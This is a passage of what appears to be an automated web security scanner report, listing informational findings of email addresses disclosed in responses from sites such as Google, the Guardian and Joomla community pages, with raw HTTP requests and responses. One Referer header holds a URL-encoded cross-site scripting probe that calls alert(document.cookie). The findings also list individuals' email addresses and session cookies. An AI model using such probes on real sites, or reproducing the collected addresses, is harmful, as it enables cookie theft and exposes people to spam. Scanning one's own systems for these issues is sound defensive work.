Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=adTYhQttweA;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:44:39 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

24.334. https://www.google.com/accounts/ServiceLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:
  • pat@example.com

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=UyGwfUaxON0;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:45:03 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10829
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

24.335. http://www.goozernation.com/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goozernation.com
Path:   /video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Issue detail

The following email address was disclosed in the response:
  • mike@goozernation.com

Request

GET /video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq HTTP/1.1
Host: www.goozernation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 75a2a69c945fc9bbaf3897f5bc47b14f=dp2ff9jkt3mlta9rvo5qn02g00; path=/
Last-Modified: Tue, 25 Jan 2011 05:05:19 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
<a href="mailto:mike@goozernation.com">
...[SNIP]...

24.336. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x22

Issue detail

The following email address was disclosed in the response:
  • userhelp@guardian.co.uk

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x22 HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:10 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xncjZER1lBQUJLMGhWRUFBQURPfDRITzhrOE5rMFFuWjR0VzZTc2w4T3c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 07
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="mailto: userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
...[SNIP]...

24.337. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Issue detail

The following email address was disclosed in the response:
  • userhelp@guardian.co.uk

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:09 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xRcjdERGtBQUJLenJTa0FBQUFhfElYV0o2UkFvL21wbDQ3R2hEWDJ0R2c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:09 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjEyOTYyMTg1OTMxNDExNDAzMjk3MTEyMDIxMDkyNzIzOTg3NTQ=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="mailto: userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
...[SNIP]...

24.338. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Issue detail

The following email address was disclosed in the response:
  • userhelp@guardian.co.uk

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:12 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc21BcjdERGtBQUJLenJaZ0FBQUF2fGoxRDF3NkVwdXoyRzRZSm85RTN1Q1E9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:12 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="mailto: userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
...[SNIP]...

24.339. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The following email address was disclosed in the response:
  • lokesh.dhakar@gmail.com

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:07 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
<input type="hidden" name="business" value="lokesh.dhakar@gmail.com" />
...[SNIP]...

24.340. https://www.isc.org/software/inn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.isc.org
Path:   /software/inn

Issue detail

The following email address was disclosed in the response:
  • inn-workers@lists.isc.org

Request

GET /software/inn HTTP/1.1
Host: www.isc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 00:03:30 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8k DAV/2 PHP/5.2.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.12
Set-Cookie: SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:03:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<a href="https://lists.isc.org/mailman/listinfo/inn-workers">inn-workers@lists.isc.org</a>
...[SNIP]...

24.341. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlacommunity.eu
Path:   /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The following email address was disclosed in the response:
  • donatie@joomlacommunity.eu

Request

GET /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html HTTP/1.1
Host: www.joomlacommunity.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
<input type="hidden" name="business" value="donatie@joomlacommunity.eu"/>
...[SNIP]...

24.342. http://www.kbsp.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kbsp.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • cclarke@kbsp.com
  • dzdobinski@kbsp.com
  • jobs@kbsp.com

Request

GET / HTTP/1.1
Host: www.kbsp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:04:54 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 02 Dec 2010 20:39:41 GMT
ETag: "97908-80e8-496736bcf5d40"
Accept-Ranges: bytes
Content-Length: 33000
Cache-Control: max-age=60
Expires: Mon, 24 Jan 2011 22:05:54 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<a class="contactLinks" href="mailto: cclarke@kbsp.com">cclarke@kbsp.com <img src='x/images/orangeArrow.png' width='3' height='5' alt='' />
...[SNIP]...
<a class="contactLinks" href="mailto: dzdobinski@kbsp.com">dzdobinski@kbsp.com <img src='x/images/orangeArrow.png' width='3' height='5' alt='' />
...[SNIP]...
<a class="contactLinks" href="mailto: jobs@kbsp.com">jobs@kbsp.com <img src='x/images/orangeArrow.png' width='3' height='5' alt='' />
...[SNIP]...

24.343. http://www.kelvinluck.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kelvinluck.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • emansouri@ucompass.com

Request

GET / HTTP/1.1
Host: www.kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:45 GMT
Server: Apache
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 04:35:17 GMT
Vary: Accept-Encoding
Content-Length: 106212
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The personal webl
...[SNIP]...
<a href="http://blogs.ucompass.com/emansouri@ucompass.com/163">
...[SNIP]...

24.344. http://www.lau.edu.lb/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lau.edu.lb
Path:   /x22

Issue detail

The following email addresses were disclosed in the response:
  • krodriguez@lau.edu.lb
  • lrachidi@lau.edu.lb
  • rewa.borjas@lau.edu.lb

Request

GET /x22 HTTP/1.1
Host: www.lau.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:26 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 2977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<t
...[SNIP]...
e this file is updated, kindly check if the    **
**    footer_alumni.php file needs to be updted as well    **
**********************************************************

- Updated By Louaye Rachidi (lrachidi@lau.edu.lb) on 2008/09/05.
- Updated by Rewa Borjas (rewa.borjas@lau.edu.lb) c. 2008/12/20.
- Updated by Karina Rodriguez (krodriguez@lau.edu.lb) on 2008/12/30.
-->
...[SNIP]...

24.345. http://www.leafnode.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leafnode.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • m-a@users.sourceforge.net

Request

GET / HTTP/1.1
Host: www.leafnode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:01:28 GMT
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 16:01:28 GMT
Content-Length: 6073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<HTML lang="en">
<HEAD>
   <link rel="stylesheet" title="Leafnode style" href="ln.css">
<link
...[SNIP]...
<a href="mailto:m-a@users.sourceforge.net">
...[SNIP]...

24.346. http://www.lithuanianjoomla.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /index.php

Issue detail

The following email address was disclosed in the response:
  • info@lithuanianjoomla.com

Request

GET /index.php?format=feed&type=rss HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 11621

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Joomla! 1.6 - Open Source Content Management" -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
   <channel>
       <title>Lithuanianjoom
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Antanas Vipartas)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Stasys)</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Antanas Vipartas )</author>
...[SNIP]...
<author>info@lithuanianjoomla.com (Rimas Armaitis, koregavo Antanas Vipartas)</author>
...[SNIP]...

24.347. http://www.lithuanianjoomla.com/media/system/js/mootools-more.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /media/system/js/mootools-more.js

Issue detail

The following email addresses were disclosed in the response:
  • erik@domain.com
  • espen@domene.no
  • fred@domain.com
  • fred@domain.hu
  • fred@domaine.com
  • fred@domein.nl
  • fred@dominio.com
  • jan@domena.pl
  • maria@bernasconi.ch
  • matti@meikalainen.com
  • max@mustermann.de
  • name@domain.com
  • nome@dominio.com

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Apache
Last-Modified: Mon, 10 Jan 2011 15:32:50 GMT
ETag: "31195df-5244c-4d2b26a2"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 336972

// MooTools: the javascript framework.
// Load this file's selection again by visiting: http://mootools.net/more/f04c978bcdfd762ce3cc0d21a61c819d
// Or build this file again with packager using: pack
...[SNIP]...
   dateSuchAs: 'Please enter a valid date such as {date}',
   dateInFormatMDY: 'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',
   email: 'Please enter a valid email address. For example "fred@domain.com".',
   url: 'Please enter a valid URL such as http://www.google.com.',
   currencyDollar: 'Please enter a valid $ amount. For example $100.00 .',
   oneRequired: 'Please enter something for at least one of
...[SNIP]...
a valida com {date}',
   dateInFormatMDY: 'Per favor introdueix una data valida com DD/MM/YYYY (p.e. "31/12/1999")',
   email: 'Per favor, introdueix una adre..a de correu electronic valida. Per exemple, "fred@domain.com".',
   url: 'Per favor introdueix una URL valida com http://www.google.com.',
   currencyDollar: 'Per favor introdueix una quantitat valida de .... Per exemple ...100,00 .',
   oneRequired: 'Per favor intro
...[SNIP]...
'Zadejte pros..m platn.. datum jako {date}',
   dateInFormatMDY: 'Zadejte pros..m platn.. datum jako MM / DD / RRRR (tj. "12/31/1999")',
   email: 'Zadejte pros..m platnou e-mailovou adresu. Nap....klad "fred@domain.com".',
   url: 'Zadejte pros..m platnou URL adresu jako http://www.google.com.',
   currencyDollar: 'Zadejte pros..m platnou ....stku. Nap....klad $100.00.',
   oneRequired: 'Zadejte pros..m alespo.. jednu hod
...[SNIP]...
ndre tegn er ikke tilladt.',
   dateSuchAs: 'Skriv en gyldig dato som {date}',
   dateInFormatMDY: 'Skriv dato i formatet DD-MM-YYYY (f.eks. "31-12-1999")',
   email: 'Skriv en gyldig e-mail adresse. F.eks "fred@domain.com".',
   url: 'Skriv en gyldig URL adresse. F.eks "http://www.google.com".',
   currencyDollar: 'Skriv et gldigt bel..b. F.eks Kr.100.00 .',
   oneRequired: 'Et eller flere af felterne i denne formular skal u
...[SNIP]...
rmatMDY: 'Geben Sie bitte ein g&uuml;ltiges Datum ein. Wie zum Beispiel TT.MM.JJJJ (z.B. &quot;31.12.1999&quot;)',
   email: 'Geben Sie bitte eine g&uuml;ltige E-Mail Adresse ein. Wie zum Beispiel &quot;maria@bernasconi.ch&quot;.',
   url: 'Geben Sie bitte eine g&uuml;ltige URL ein. Wie zum Beispiel http://www.google.ch.',
   currencyDollar: 'Geben Sie bitte einen g&uuml;ltigen Betrag in Schweizer Franken ein. Wie zum Beisp
...[SNIP]...
quot;).',
   dateInFormatMDY: 'Geben Sie bitte ein g&uuml;ltiges Datum im Format TT.MM.JJJJ ein (z.B. &quot;31.12.1999&quot;).',
   email: 'Geben Sie bitte eine g&uuml;ltige E-Mail-Adresse ein (z.B. &quot;max@mustermann.de&quot;).',
   url: 'Geben Sie bitte eine g&uuml;ltige URL ein (z.B. &quot;http://www.google.de&quot;).',
   currencyDollar: 'Geben Sie bitte einen g&uuml;ltigen Betrag in EURO ein (z.B. 100.00&#8364;).',
   
...[SNIP]...
como {date}',
   dateInFormatMDY: 'Por favor ingrese una fecha v..lida, utulizando el formato DD/MM/YYYY (p.e. "31/12/1999")',
   email: 'Por favor, ingrese una direcci..n de e-mail v..lida. Por ejemplo, "fred@dominio.com".',
   url: 'Por favor ingrese una URL v..lida como http://www.google.com.',
   currencyDollar: 'Por favor ingrese una cantidad v..lida de pesos. Por ejemplo $100,00 .',
   oneRequired: 'Por favor ingrese a
...[SNIP]...
o {date}',
   dateInFormatMDY: 'Por favor introduce una fecha v&aacute;lida como DD/MM/YYYY (p.e. "31/12/1999")',
   email: 'Por favor, introduce una direcci&oacute;n de email v&aacute;lida. Por ejemplo, "fred@domain.com".',
   url: 'Por favor introduce una URL v&aacute;lida como http://www.google.com.',
   currencyDollar: 'Por favor introduce una cantidad v&aacute;lida de .... Por ejemplo ...100,00 .',
   oneRequired: 'Por
...[SNIP]...
lun sisestage kehtiv kuup..ev kujul {date}',
   dateInFormatMDY: 'Palun sisestage kehtiv kuup..ev kujul MM.DD.YYYY (n..iteks: "12.31.1999").',
   email: 'Palun sisestage kehtiv e-maili aadress (n..iteks: "fred@domain.com").',
   url: 'Palun sisestage kehtiv URL (n..iteks: http://www.google.com).',
   currencyDollar: 'Palun sisestage kehtiv $ summa (n..iteks: $100.00).',
   oneRequired: 'Palun sisestage midagi v..hemalt ..he
...[SNIP]...
kiksi {date}',
   dateInFormatMDY: 'Ole hyv.. ja anna kelvollinen p..iv..m....r.. muodossa pp/kk/vvvv (kuten "12/31/1999")',
   email: 'Ole hyv.. ja anna kelvollinen s..hk..postiosoite (kuten esimerkiksi "matti@meikalainen.com").',
   url: 'Ole hyv.. ja anna kelvollinen URL, kuten esimerkiksi http://www.google.fi.',
   currencyDollar: 'Ole hyv.. ja anna kelvollinen eurosumma (kuten esimerkiksi 100,00 EUR) .',
   oneRequired: 'Ole
...[SNIP]...
ecte comme {date}',
   dateInFormatMDY: 'Veuillez saisir une date correcte, au format JJ/MM/AAAA (ex : "31/11/1999").',
   email: 'Veuillez saisir une adresse de courrier &eacute;lectronique. Par example "fred@domaine.com".',
   url: 'Veuillez saisir une URL, comme http://www.google.com.',
   currencyDollar: 'Veuillez saisir une quantit&eacute; correcte. Par example 100,00&euro;.',
   oneRequired: 'Veuillez s&eacute;lectionn
...[SNIP]...
um megad..sa sz..ks..ges (pl. {date}).',
   dateInFormatMDY: 'Val..s d..tum megad..sa sz..ks..ges .........HH.NN. form..ban. (pl. "1999.12.31.")',
   email: 'Val..s e-mail c..m megad..sa sz..ks..ges (pl. "fred@domain.hu").',
   url: 'Val..s URL megad..sa sz..ks..ges (pl. http://www.google.com).',
   currencyDollar: 'Val..s p..nz..sszeg megad..sa sz..ks..ges (pl. 100.00 Ft.).',
   oneRequired: 'Az al..bbi mez..k legal..bb e
...[SNIP]...
teSuchAs: 'Inserire una data valida del tipo {date}',
   dateInFormatMDY: 'Inserire una data valida nel formato MM/GG/AAAA (es.: "12/31/1999")',
   email: 'Inserire un indirizzo email valido. Per esempio "nome@dominio.com".',
   url: 'Inserire un indirizzo valido. Per esempio "http://www.dominio.com".',
   currencyDollar: 'Inserire un importo valido. Per esempio "$100.00".',
   oneRequired: 'Completare almeno uno dei campi r
...[SNIP]...
uchAs: 'Vul een geldige datum in, zoals {date}',
   dateInFormatMDY: 'Vul een geldige datum, in het formaat MM/DD/YYYY (bijvoorbeeld "12/31/1999")',
   email: 'Vul een geldig e-mailadres in. Bijvoorbeeld "fred@domein.nl".',
   url: 'Vul een geldige URL in, zoals http://www.google.nl.',
   currencyDollar: 'Vul een geldig $ bedrag in. Bijvoorbeeld $100.00 .',
